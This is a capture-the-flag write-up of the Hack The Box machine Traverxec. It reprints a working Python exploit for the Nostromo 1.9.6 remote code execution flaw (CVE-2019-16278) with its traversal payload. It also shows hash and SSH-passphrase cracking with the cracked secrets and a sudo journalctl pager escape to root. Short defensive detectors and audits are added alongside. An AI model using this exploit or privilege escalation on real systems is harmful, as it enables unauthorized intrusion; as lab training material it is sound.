Traverxec

TL;DR

  • Find the webserver version and exploit CVE-2019-16278 on Nostromo
  • Crack the user’s hash and use directory traversal to retrieve the private key
  • Abuse journalctl to get root

User.txt

Reconnaissance

Let’s start with an Nmap scan:

magnussen@funcMyLife:~/traverxec$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traverxec.txt
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-18 21:24 CET
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating Ping Scan at 21:24
Scanning 10.10.10.165 [4 ports]
Completed Ping Scan at 21:24, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:24
Completed Parallel DNS resolution of 1 host. at 21:24, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:24
Scanning 10.10.10.165 [65535 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Increasing send delay for 10.10.10.165 from 0 to 5 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 10.10.10.165 from 5 to 10 due to 11 out of 18 dropped probes since last increase.
Completed SYN Stealth Scan at 21:24, 39.50s elapsed (65535 total ports)
Initiating Service scan at 21:24
Scanning 2 services on 10.10.10.165
Completed Service scan at 21:24, 6.51s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.165.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 1.99s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Nmap scan report for 10.10.10.165
Host is up, received echo-reply ttl 63 (0.035s latency).
Scanned at 2020-02-18 21:24:00 CET for 49s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4=
|   256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s
80/tcp open  http    syn-ack ttl 63 nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.85 seconds
           Raw packets sent: 196637 (8.652MB) | Rcvd: 22 (952B)

So we find 2 useful services:

  • OpenSSH (22)
  • Apache (80)

The website is a single page website about a developer.

If we request a page that does not exist, the 404 error page discloses the web server version.

magnussen@funcMyLife:~/traverxec$ curl traverxec.htb/test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
</head>
<body>

<h1>404 Not Found</h1>

<hr>
<address>nostromo 1.9.6 at traverxec.htb Port 80</address>
</body>
</html>

Nostromo RCE

We can check for known CVEs affecting Nostromo 1.9.6.

We find the following script on ExploitDB:

#!/usr/bin/env python
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

cve2019_16278.py

import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)

    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)

    except IndexError:
        print(help_menu)

Let’s try it:

magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 id

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    




HTTP/1.1 200 OK
Date: Tue, 18 Feb 2020 20:50:21 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

We now have command execution on the machine as www-data.
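
Added example (not part of the original writeup or the ExploitDB script): a detection check for the request shape used above, where .%0d. decodes to a dot, a carriage return and a dot. It decodes the path, drops control bytes, then tests whether the result climbs above the document root. The sample request lines are constructed, and naive_check is a hypothetical weak filter shown for contrast.

```python
import re
from urllib.parse import unquote_to_bytes

CTRL = re.compile(rb"[\x00-\x1f\x7f]")  # bytes that never belong in a URL path

def naive_check(target):
    """Weak filter (hypothetical): decode once, look for a literal '/../'."""
    return b"/../" in unquote_to_bytes(target)

def canonical_path(target):
    """Percent-decode the path, then drop control bytes a lenient parser might."""
    return CTRL.sub(b"", unquote_to_bytes(target.split("?", 1)[0]))

def escapes_root(target):
    """True if the canonical path climbs above the document root."""
    depth = 0
    for seg in canonical_path(target).split(b"/"):
        if seg in (b"", b"."):
            continue
        depth += -1 if seg == b".." else 1
        if depth < 0:
            return True
    return False

def classify(request_line):
    """Return the list of findings for one HTTP request line."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    target = parts[1]
    findings = []
    if CTRL.search(unquote_to_bytes(target.split("?", 1)[0])):
        findings.append("control-byte-in-path")
    if escapes_root(target):
        findings.append("traversal")
    return findings

# Constructed request lines; the last one has the shape of the payload above.
SAMPLES = [
    "GET /index.html HTTP/1.1",
    "GET /img/../css/style.css HTTP/1.1",
    "GET /../../etc/passwd HTTP/1.1",
    "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "clean", "|", line)
```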

Crack user password and RSA passphrase

Let’s go deeper:

magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/"
drwxr-xr-x 12 root root  4.0K Oct 25 14:43 .
drwxr-xr-x 18 root root  4.0K Oct 25 14:17 ..
drwxr-xr-x  2 root root  4.0K Nov 12 06:25 backups
drwxr-xr-x  9 root root  4.0K Oct 25 14:34 cache
drwxr-xr-x 26 root root  4.0K Nov 12 04:56 lib
drwxrwsr-x  2 root staff 4.0K May 13  2019 local
lrwxrwxrwx  1 root root     9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x  5 root root  4.0K Feb 18 13:39 log
drwxrwsr-x  2 root mail  4.0K Oct 25 14:15 mail
drwxr-xr-x  6 root root  4.0K Oct 25 14:43 nostromo
drwxr-xr-x  2 root root  4.0K Oct 25 14:15 opt
lrwxrwxrwx  1 root root     4 Oct 25 14:15 run -> /run
drwxr-xr-x  4 root root  4.0K Oct 25 14:16 spool
drwxrwxrwt  3 root root  4.0K Feb 18 13:56 tmp
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo"
drwxr-xr-x  6 root     root   4.0K Oct 25 14:43 .
drwxr-xr-x 12 root     root   4.0K Oct 25 14:43 ..
drwxr-xr-x  2 root     daemon 4.0K Oct 27 16:12 conf
drwxr-xr-x  6 root     daemon 4.0K Oct 25 17:11 htdocs
drwxr-xr-x  2 root     daemon 4.0K Oct 25 14:43 icons
drwxr-xr-x  2 www-data daemon 4.0K Feb 18 15:11 logs
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo/conf"
drwxr-xr-x 2 root daemon 4.0K Oct 27 16:12 .
drwxr-xr-x 6 root root   4.0K Oct 25 14:43 ..
-rw-r--r-- 1 root bin      41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin    2.9K Oct 25 14:26 mimes
-rw-r--r-- 1 root bin     498 Oct 25 15:20 nhttpd.conf
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/.htpasswd"
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/nhttpd.conf"
# MAIN [MANDATORY]
servername        traverxec.htb
serverlisten        *
serveradmin        david@traverxec.htb
serverroot        /var/nostromo
servermimes        conf/mimes
docroot            /var/nostromo/htdocs
docindex        index.html

# LOGS [OPTIONAL]
logpid            logs/nhttpd.pid

# SETUID [RECOMMENDED]
user            www-data

# BASIC AUTHENTICATION [OPTIONAL]
htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]
/icons            /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs        /home
homedirs_public        public_www
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/"
total 12K
drwxr-xr-x  3 root  root  4.0K Oct 25 14:32 .
drwxr-xr-x 18 root  root  4.0K Oct 25 14:17 ..
drwx--x--x  6 david david 4.0K Feb 18 15:24 david

OK, so we found a hash. We can crack it with hashcat:

magnussen@funcMyLife:~/traverxec$ hashcat -m 500 -a 0 --force 'david_hash.txt' 'rockyou.txt' --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me

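As we saw in nhttpd.conf, homedirs is set to /home and homedirs_public to public_www, so each user’s public web directory is /home/<user>/public_www. /home/david has mode drwx--x--x: other users cannot list it, but the execute bit lets them traverse into a subdirectory whose name they already know. We can therefore list the files inside public_www even though we can’t list the content of /home/david.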

magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/"
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 protected-file-area
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/protected-file-area"
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 .
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 ..
-rw-r--r-- 1 david david   45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1.9K Oct 25 17:02 backup-ssh-identity-files.tgz

We can recover the archive with zcat:

magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "zcat /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz"

home/david/.ssh/0000700000175000017500000000000013554661372012712 5ustar  daviddavidhome/david/.ssh/authorized_keys0000644000175000017500000000061513554661372016062 0ustar  daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
home/david/.ssh/id_rsa0000600000175000017500000000334613554661335014105 0ustar  daviddavid
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
[...]
-----END RSA PRIVATE KEY-----

home/david/.ssh/id_rsa.pub0000644000175000017500000000061513554661364014700 0ustar  daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
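
Added example (not from the original writeup): a check a defender could run over archives sitting in web-served directories such as public_www, flagging members that carry private keys or live under .ssh. The archive is built in memory with the member names seen above and constructed placeholder contents; scan_archive and build_sample are names chosen for this example.

```python
import io
import re
import tarfile

KEY_HEADER = re.compile(rb"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")
SENSITIVE_PATH = re.compile(r"(^|/)(\.ssh/|\.htpasswd$)")

def scan_archive(fileobj):
    """Return (member, reason) for each sensitive file in a tar archive."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:  # any compression
        for member in tar:
            if not member.isfile():
                continue
            head = tar.extractfile(member).read(4096)
            if KEY_HEADER.search(head):
                # Legacy PEM keys announce encryption in their header lines.
                reason = "private key"
                if b"ENCRYPTED" in head:
                    reason += ", passphrase-protected"
                findings.append((member.name, reason))
            elif SENSITIVE_PATH.search(member.name):
                findings.append((member.name, "sensitive path"))
    return findings

def build_sample():
    """Constructed .tgz with placeholder contents (no real key material)."""
    files = {
        "home/david/.ssh/authorized_keys": b"ssh-rsa PLACEHOLDER david@traverxec\n",
        "home/david/.ssh/id_rsa": (
            b"-----BEGIN RSA PRIVATE KEY-----\n"
            b"Proc-Type: 4,ENCRYPTED\n"
            b"PLACEHOLDER\n"
            b"-----END RSA PRIVATE KEY-----\n"
        ),
        "home/david/.ssh/id_rsa.pub": b"ssh-rsa PLACEHOLDER david@traverxec\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for name, reason in scan_archive(build_sample()):
        print(f"{reason:40} {name}")
```

A passphrase-protected key is still reported as a finding, because the passphrase is only as strong as its resistance to a wordlist.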

It’s time to crack the private key’s passphrase with John the Ripper!

magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/ssh2john.py david_private_key.txt > crack_david.txt
magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/john --wordlist=rockyou.txt  crack_david.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (david_private_key.txt)
1g 0:00:00:03 DONE (2020-02-18 22:07) 0.2710g/s 3886Kp/s 3886Kc/s 3886KC/s ¡Vamos!
Session completed

We have everything we need to connect to the server with SSH.

magnussen@funcMyLife:~/traverxec$ ssh -i david_private_key.txt david@traverxec.htb
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ ls -alh
total 44K
drwx--x--x 6 david david 4.0K Feb 18 15:24 .
drwxr-xr-x 3 root  root  4.0K Oct 25 14:32 ..
lrwxrwxrwx 1 root  root     9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david  220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3.5K Oct 25 14:32 .bashrc
-rw------- 1 david david  130 Feb 18 15:19 .lesshst
drwxr-xr-x 3 david david 4.0K Feb 18 15:24 .local
-rw-r--r-- 1 david david  807 Oct 25 14:32 .profile
drwx------ 2 david david 4.0K Oct 25 17:02 .ssh
drwx------ 2 david david 4.0K Feb 18 15:08 bin
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 public_www
-r--r----- 1 root  david   33 Oct 25 16:14 user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d

I AM ROOT

Journalctl abuse

Let’s see how we can get root. We start by looking in the bin directory:

david@traverxec:~/bin$ ls -alh
total 20K
-rw-r--r-- 1 david david  621 Feb 18 15:08 -pager
drwx------ 2 david david 4.0K Feb 18 15:08 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

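Alright, journalctl is run with sudo. The script pipes its output into cat, but when we run the same command directly on a terminal, journalctl hands its output to a pager that runs as root, and the pager’s ! command lets us start a shell as root!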

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2020-02-18 14:25:14 EST, end at Tue 2020-02-18 16:12:25 EST. --
Feb 18 16:00:54 traverxec sudo[18362]: pam_unix(sudo:auth): authentication failure; logname
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): conversation failed
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): auth could not identify passwor
Feb 18 16:00:56 traverxec sudo[18362]: www-data : command not allowed ; TTY=pts/15 ; PWD=/t
Feb 18 16:00:57 traverxec crontab[18424]: (www-data) LIST (www-data)
!/bin/sh
# /bin/bash
root@traverxec:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:~# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906
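
Added example (not from the original writeup): a small audit for sudoers rules of this kind, which let a pager start as root. It flags pager-capable commands that are allowed without the NOEXEC tag and without --no-pager in the permitted arguments. The sudoers lines are constructed (the box's real sudoers file is not shown on this page), and the parser handles simple one-line user specifications only.

```python
import os
import re

# Programs that page their output on a terminal, mapped to the argument (if
# any) that turns the pager off. Illustrative list, extend as needed.
PAGER_CAPABLE = {"journalctl": "--no-pager", "systemctl": "--no-pager",
                 "man": None, "less": None}
SPEC = re.compile(r"^(?P<who>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?P<cmds>.+)$")
TAGS = re.compile(r"^((?:[A-Z_]+:\s*)*)(.*)$")

def audit(sudoers_text):
    """Return (user, command) pairs that allow a root-owned pager to start.

    No aliases, line continuations or escaped commas are handled.
    """
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        noexec = False
        for cmd in m["cmds"].split(","):
            tagpart, rest = TAGS.match(cmd.strip()).groups()
            tags = re.findall(r"[A-Z_]+", tagpart)
            # Tags carry over to later commands in the list until overridden.
            if "NOEXEC" in tags:
                noexec = True
            if "EXEC" in tags:
                noexec = False
            argv = rest.split()
            if not argv:
                continue
            name = os.path.basename(argv[0])
            if name not in PAGER_CAPABLE or noexec:
                continue
            pager_off = PAGER_CAPABLE[name]
            if pager_off is None or pager_off not in argv[1:]:
                findings.append((m["who"], rest))
    return findings

# Constructed sample: one weak rule, two hardened forms, one mixed list.
SAMPLE = """\
Defaults env_reset
david ALL=(ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
david ALL=(root) NOPASSWD: NOEXEC: /usr/bin/journalctl -n5 -unostromo.service
ops ALL=(root) /usr/bin/uptime, /usr/bin/man
"""
```

Because sudoers matches listed arguments exactly, putting --no-pager into the rule forces every permitted invocation to run without a pager.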

This was a nice box, not very difficult, but a good way to start on Hack The Box.